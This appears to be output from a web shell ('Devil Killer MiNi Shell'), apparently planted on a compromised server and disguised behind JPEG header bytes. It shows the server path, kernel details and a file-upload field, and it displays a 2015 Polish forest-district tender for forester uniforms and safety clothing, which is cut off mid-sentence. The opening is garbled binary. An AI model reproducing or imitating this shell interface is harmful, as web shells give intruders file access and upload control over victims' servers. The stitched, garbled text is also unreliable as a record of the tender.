JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150430/100600-N-2015.html

<p class="kh_header"><b>Lubartów: Dostawa elementów mundurowych leśnika oraz sortów bhp</b><br>
<b>Numer ogłoszenia: 100600 - 2015; data zamieszczenia: 30.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Lubartów , ul. gen. Kleeberga 17, 21-100 Lubartów, woj. lubelskie, tel. 081 8552314, faks 081 8552278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubartow.lublin.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów mundurowych leśnika oraz sortów bhp.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa elementów mundurowych leśnika oraz sortów bhp do siedziby biura Nadleśnictwa Lubartów.
2. Elementy umundurowania powinny być wykonane według wzorów określonych:
-Zarządzeniem nr 62 Dyrektora Generalnego Lasów Państwowych w sprawie wzorca oraz
zasad i norm użytkowania mundurów leśnika przez pracowników Lasów Państwowych z
dnia 15.07.2013r.
- Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005
r., w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych
przedmiotów mundurów leśnika,
- Rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014 r., w sprawie wzoru
mundurów leśnika i oznak dla osób uprawnionych do ich noszenia.
-Zarządzeniem nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja
2012 r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych
przedmiotów mundurów leśnika,
-Zarządzeniem nr 54 Dyrektora Generalnego Lasów Państwowych z dnia 06.07.2012 r. w
sprawie zmian zarządzenia nr. 44 Dyrektora Generalnego Lasów Państwowych w sprawie
zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów
mundurów leśnika.
3. Sorty bhp obejmują środki ochrony indywidualnej oraz odzież roboczą i obuwie bhp. Sorty
bhp powinny odpowiadać wzorcom określonym w Polskich Normach tj. m.in. odzież
ochronna i robocza dostarczana dla pracowników Lasów Państwowych musi posiadać atesty,
odpowiednie parametry techniczne, zapewnić bezpieczne wykonywanie czynności
związanych z procesem pracy i musi być oznaczona symbolem (CE). Odzież ochronna i
obuwie bhp powinna odpowiadać wymaganiom Rozporządzenia Ministra Gospodarki z dnia
21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej
(Dz. U. 2005 nr 259 poz. 2173).
Szczegółowy opis odzieży BHP zawierają Polskie Normy:
-odzież ochronna (ubrania): wymagania ogólne PN-EN 340:2006;
- środki ochrony indywidualnej obuwie bezpieczne PN-EN ISO 20345:2012
-obuwie ochronne PN-EN ISO 20346:2007/A1:2008;
-odzież ochronna -ochrona przed deszczem PN-EN 343+A1:2008;
- odzież ochronna- wyroby odzieżowe chroniące przed chłodem PN-EN
14058:2007.
-odzież ochronna dla użytkowników pilarek łańcuchowych przenośnych --
Wymagania dotyczące ochrony nóg- PN-EN 381-5:2000
oraz Dyrektywa Rady Wspólnot Europejskich 89/686/EWG.
4. Wielkość przedmiotu zamówienia w zakresie umundurowania określona jest na 4825 pkt.,
ustalonych w oparciu o zarządzenie nr 62 Dyrektora Generalnego Lasów Państwowych z
dnia 15.07.2013 r.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 i 1a do SWIZ. Dokumentacja techniczno-technologiczna mundurów leśnika łącznie z jej fotograficzną wersją dostępna jest również do wglądu na stronie internetowej Ośrodka Rozwojowo-Wdrożeniowego Lasów Państwowych w Bedoniu pod adresem:
http://www.bedon.lasy.gov.pl/dokumentacja-techniczno-technologiczna#.VHw_bGfzL14

Łączna ilość zamówienia na poszczególne elementy umundurowania leśnika:

I. Mundur wyjściowy leśnika:Marynarka - gabardyna lub tropik:męska	Szt.	2,
damska Szt.0; Spodnie - gabardyna lub tropik:	męskie	Szt.	5, damskie Szt.	0; Marynarka - gabardyna z wykończeniem oleofobowym męska	Szt.	2,
damska	Szt.	0; Spodnie gabardyna z wykończeniem oleofobowym: męskie Szt.	2, damskie	Szt.	0; Spódnica gabardyna lub tropik	Szt.	0; Spódnica - gabardyna z wykończeniem oleofobowym Szt. 0; Koszula biała męska długi rękaw Szt. 14; Koszula biała męska krótki rękaw	Szt.	10; Bluzka biała damska z długim rękawem	Szt.	0; Bluzka biała damska z krótkim rękawem Szt.	0; Koszula biała męska długi rękaw - bawełna 100% Szt.11; Koszula biała męska krótki rękaw - bawełna 100% Szt.10; Bluzka biała damska z długim rękawem - bawełna 100%	Szt.	0; Bluzka biała damska z krótkim rękawem- bawełna 100%	Szt.	1; Krawat Szt.4, Czapka mundurowa Szt. 2; Płaszcz wiosenno - jesienny męski	Szt. 3; Płaszcz wiosenno - jesienny damski	Szt.1; Kapelusz męski	Szt. 5; Kapelusz damski Szt.0; Kurtka zimowa męska Szt. 4; Kurtka zimowa damska Szt. 1; Szalik	Szt.	0; Rękawice damskie	Par 	0; Rękawice męskie Par	7; Skarpety letnie termoaktywne	Par	27; Skarpety przejściowe termoaktywne	Par	25; Skarpety zimowe termoaktywne Par 21; 
Półbuty męskie	Par	12; Półbuty damskie	Par	1
II Mundur codzienny leśnika: Koszula męska z długim rękawem Szt.12;
Koszula męska z krótkim rękawem Szt. 10; Bluzka damska z długim rękawem Szt.	0; Bluzka damska z krótkim rękawem	Szt. 0; Koszula męska długi rękaw bawełna 100%	Szt.	15; Koszula męska krótki rękaw  bawełna 100%	Szt.10; Bluzka damska z długim rękawem - bawełna 100% Szt. 1; Bluzka damska z krótkim rękawem - bawełna 100% Szt. 1; Sweter (nowy wzór)	Szt.	21; Kamizelka	Szt.	8; Bluza z polaru typu windstoper Szt.	9; Kurtka wierzchnia Szt.	5; Czapka zimowa	Szt.	1; Peleryna Szt.	0, Półbuty typu Sympatex lub równoważne Par	8; Półbuty typu Gore - tex lub równoważne Par	15
III. Mundur terenowy leśnika: Bluza z kamizelką letnią	Szt.	10; Spodnie letnie Szt.	27, Czapka letnia Szt.	5; Kurtka zimowa Szt. 3, Spodnie zimowe	Szt.4; Czapka zimowa	Szt.	1; Trzewiki typu Sympatex lub równoważne	Par 4; Trzewiki typu Gore-tex lub równoważne - niskie	Par	4; Trzewiki typu Gore-tex lub równoważne - wysokie	Par	9; Trzewiki typu Sympatex lub równoważne - z ociepleniem typu Thinsulate lub równoważnym	Par	1; Trzewiki typu Gore-tex lub równoważne - niskie z ociepleniem typu Thinsulate  lub równoważnym	Par	1; Trzewiki typu Gore-tex lub równoważne -wysokie z ociepleniem typu Thinsulate lub równoważnym Par	8;
IV. Oznaki uzupełniające:	Oznaki służbowe wyhaftowane bajorkiem Szt. 2;
Stylizowany wizerunek orła	Szt.	1; Gałązka modrzewia Szt.	0
V. Przedmioty uzupełniające: Torba raportówka	Szt.	0

Łączna ilość zamówienia na sorty bhp:
Ubranie letnie (w tym 2 pary spodni)	Kpl.	27;
Ubranie ocieplane, tkanina z membraną oddychającą	Kpl.	27;
Kurtka i spodnie przeciwdeszczowe	Kpl.	27;
Koszula robocza, długi rękaw	szt.	27;
Koszulka krótki rękaw  t-shirt	szt.	27;
Bielizna:
Koszulka termoaktywna, krótki rękaw	szt.	27;
Koszulka termoaktywna, długi rękaw	szt.	27;
Kalesony męskie termoaktywne, leginsy damskie termoaktywne	szt.	27;
Buty terenowe, wodochronne z membraną oddychającą	par	27;
Buty (gumowe) wodoodporne	par	27;
Buty (gumowe) wodoodporne i ciepłochronne	par	27;
Ochraniacze na buty (stuptuty)	par	27;
Skarpety letnie, termoaktywne 	par	54;
Skarpety zimowe, termoaktywne 	par	54;
Czapka letnia	Szt.	27;
Hełm ochronny	Szt.	27;
Czepek pod hełm ochronny	Szt.	27;
Okulary przeciwsłoneczne (polaryzacyjne)	par	27;
Kamizelka ostrzegawcza	Szt.	27;
Rękawice robocze	par	27;
Rękawice ocieplane	par	27;
Ubranie całoroczne, tkanina z membraną oddychającą	Kpl.	11;
Kurtka i spodnie przeciwdeszczowe	Kpl.	11;
Bielizna:
Koszulka termoaktywna, krótki rękaw	Szt.	11;
Koszulka termoaktywna, długi rękaw	Szt.	11;
Kalesony męskie termoaktywne, leginsy damskie termoaktywne	Szt.	11;

Buty terenowe, wodochronne z membraną oddychającą	 Par	11;
Buty (gumowe) wodoodporne i ciepłochronne	Par	11;
Skarpety letnie, termoaktywne 	Par	11;
Skarpety zimowe, termoaktywne 	Par	11;
Hełm ochronny	Szt.	11;
Kamizelka ostrzegawcza	Szt.	11;
Okulary przeciwsłoneczne (polaryzacyjne)	Szt.	11;
Kamizelka ciepłochronna	 Szt.	6;
Ubranie letnie w kolorze ostrzegawczym	 Kpl.	1;
Ubranie ocieplane w kolorze ostrzegawczym	Kpl.	1;
Kurtka przeciwdeszczowa w kolorze ostrzegawczym	Szt.	1;
Kamizelka ocieplająca	Szt.	1;
Koszula robocza, długi rękaw	Szt.	1;
Bielizna:
Koszulka termoaktywna, krótki rękaw	Szt.	1;
Koszulka termoaktywna, długi rękaw	Szt.	1;
Kalesony męskie termoaktywne / leginsy damskie termoaktywne	Szt.	1;

Buty ochronne, podnosek ochronny	par	1;
Buty (gumowe) wodoodporne, podnosek ochronny	par	1;
Buty (gumowe) wodoodporne i ciepłochronne, podnosek ochronny	par	1;
Skarpety letnie, termoaktywne 	par	2;
Skarpety zimowe, termoaktywne 	par	2;
Czapka letnia	Szt.	1;
Czapka ocieplana	Szt.	1;
Hełm ochronny	Szt.	1;
Czepek pod hełm ochronny	Szt.	1;
Rękawice robocze	par	1;
Ubranie letnie 	 Kpl.	4;
Ubranie ocieplane	Kpl.	4;
Koszula robocza, długi rękaw	Szt.	4;
Koszulka  t-shirt, krótki rękaw	Szt.	4;
Bielizna:	
Koszulka termoaktywna, krótki rękaw	Szt.	4;
Koszulka termoaktywna, długi rękaw	Szt.	4;
Kalesony męskie termoaktywne, leginsy damskie termoaktywne	Szt.	4;

Trzewiki	par	4;
Buty (gumowe) wodoodporne i ciepłochronne par	4;
Czapka letnia	Szt.	4;
Czapka ocieplana	Szt.	4;
Fartuch roboczy	Szt.	4;
Rękawice robocze	Par	4;
Rękawice ochronne	par	4;
Okulary ochronne / gogle	Szt.	4;
Ochronniki słuchu	Szt.	4;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-0, 18.00.00.00-9, 18.11.00.00-3, 18.20.00.00-1, 18.33.00.00-1, 18.42.30.00-0, 18.44.00.00-5, 18.22.00.00-7, 18.22.22.00-3, 18.14.00.00-2, 18.80.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 3000 zł (słownie: trzy tysiące złotych zero groszy), Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. Wadium musi być wniesione przed upływem terminu składania ofert tj: 08.05.2015r. godz. 9:00
2.Wadium może być wniesione w jednej lub kilku następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r, Nr 42, poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w  PKO BP Oddział Lubartów nr: 69 1020 3206 0000 8202 0031 6901   z dopiskiem: Dostawa elementów mundurowych leśnika oraz sortów bhp. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
4)Wadium wnoszone w formie dokumentów, o których mowa w ust. 2. pkt 2-5, należy złożyć w oryginale w kasie Zamawiającego, w terminie przewidzianym na składanie ofert, lub dołączyć do oferty, w sposób, który pozwoli bez zdekompletowania oferty zwrócić oryginał dokumentu Wykonawcy. Wadium wnoszone w formie poręczeń i gwarancji musi w swej treści gwarantować bezwarunkową wypłatę pieniędzy na rzecz Zamawiającego w przypadku zaistnienia sytuacji, o których mowa w art. 46 ust. 4a i 5 ustawy PZP.
5)Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 7 poniżej.
6.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
7.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia, nie złoży z przyczyn leżących po jego stronie, dokumentów i oświadczeń na okoliczność spełnienia warunków udziału w postępowaniu, pełnomocnictw, informacji o przynależności do grupy kapitałowej lub nie wyrazi zgody na poprawienie innej omyłki, polegającej na niezgodności treści oferty ze SIWZ niepowodującej istotnych zmian w treści oferty, co spowoduje brak możliwości wybrania oferty złożonej przez tego Wykonawcę jako najkorzystniejszej.
Zamawiający również zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;
2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z
przyczyn leżących po stronie Wykonawcy.
9.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie ust. 5 powyżej, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
10.W zakresie wadium obowiązują uregulowania określone w art. 45 i 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Miarą spełnienia powyższych warunków będzie zrealizowanie przez Wykonawcę w
okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie, minimum 1 dostawę
odpowiadającą swoim rodzajem (dostawy umundurowania dla jednostek Lasów
Państwowych, wojska, policji, Straży Pożarnej lub innych służb mundurowych) i
odpowiadające wartością przedmiotowi zamówienia o wartości, co najmniej 60.000 zł
brutto odpowiednio potwierdzone, że zostały wykonane należycie.
Wykonawca może polegać na wiedzy i doświadczeniu, innych podmiotów, niezależnie od
charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów chyba, że za nieudostępnienie zasobów nie ponosi winy.Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie w oparciu o dokumenty określone w dziale VI SIWZ, a także inne dowody i dokumenty uzyskane przez Zamawiającego w toku postępowania. Z treści załączonych dokumentów i oświadczeń musi jednoznacznie wynikać, iż Wykonawca spełnił wymagany warunek udziału w postępowaniu.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, sytuacje opisane w art. 24 ust. 1 ustawy PZP nie mogą dotyczyć żadnego z nich, natomiast warunki z art. 22 ust. 1 PZP mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca polegający na wiedzy, doświadczeniu innych podmiotów winien przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie, odpowiedniego zasobu oraz wskazywać:zakresu dostępnych dla Wykonawcy zasobów innego podmiotu,
sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy
wykonaniu zamówienia, zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem. W przypadku podpisywania oferty, oświadczeń i dokumentów przez inne osoby niż wskazane w odpowiednim rejestrze lub ewidencji i informacji o działalności gospodarczej, do oferty należy dołączyć w oryginale pełnomocnictwo dla tych osób, podpisane przez osoby upoważnione do reprezentowania Wykonawcy, lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Dowody dotyczące głównych dostaw potwierdzające, że dostawy te zostały wykonane należycie. Dowodami tymi będą, poświadczenia Zamawiającego na rzecz, którego zostały wykonane dostawy, a gdy z uzasadnionych przyczyn o charakterze obiektywnym Wykonawca nie może uzyskać takiego poświadczenia - oświadczenia Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwe zmiany w umowie to możliwość:
a) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź,pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne,nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej,promieniowanie lub skażenia.
b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
c) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
d) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności
spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami
organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy
